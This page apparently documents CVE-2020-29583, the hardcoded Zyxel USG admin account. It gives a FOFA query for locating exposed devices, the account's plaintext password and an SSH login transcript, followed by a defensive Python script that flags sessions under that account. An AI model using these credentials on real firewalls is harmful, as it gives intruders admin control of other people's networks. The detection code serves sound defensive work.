# Zyxel USG Series Hardcoded Account Vulnerability (CVE-2020-29583)

FOFA:

```
title="USG40"
```

```bash
Username: zyfwp
Password: PrOw!aN_fXp
```

This account can be used on both SSH and the web interface.

```bash
$ ssh zyfwp@192.168.1.252
Password: Pr*******Xp
Router> show users current
No: 1
Name: zyfwp
Type: admin
(…)
Router>
```

![](/static/lingjiao/media/16096787060610/16096787506272.jpg)
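
The same `show users current` output can be checked on your own devices for sessions under this account. The following is an added example, not code from the original page or from Zyxel; it parses only the `No`/`Name`/`Type` fields shown in the session above, and the sample output is constructed.

```python
# Added example: flag sessions that belong to the hardcoded account in
# captured `show users current` output. Only the No/Name/Type fields shown
# on the page are parsed; any other lines are ignored.

HARDCODED_ACCOUNT = "zyfwp"  # account name from the page

# Constructed sample output (not captured from a real device).
SAMPLE_OUTPUT = """\
Router> show users current
No: 1
Name: admin
Type: admin
No: 2
Name: zyfwp
Type: admin
Router>
"""


def parse_sessions(text):
    """Split the output into one dict per session, keyed on 'No:' lines."""
    sessions, current = [], None
    for raw in text.splitlines():
        key, sep, value = raw.partition(":")
        key, value = key.strip().lower(), value.strip()
        if not sep or key not in ("no", "name", "type"):
            continue  # prompts, elided lines, unknown fields
        if key == "no":
            current = {"no": value}
            sessions.append(current)
        elif current is not None:
            current[key] = value
    return sessions


def find_hardcoded_sessions(text, account=HARDCODED_ACCOUNT):
    """Return sessions whose Name exactly matches the hardcoded account."""
    return [s for s in parse_sessions(text) if s.get("name") == account]


if __name__ == "__main__":
    for s in find_hardcoded_sessions(SAMPLE_OUTPUT):
        print(f"ALERT: session {s['no']} is logged in as "
              f"{s['name']} (type {s.get('type', '?')})")
```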

ref:

* https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html
* https://twitter.com/dozernz/status/1344435468868358145
* https://forum.ywhack.com/thread-114904-1-1.html
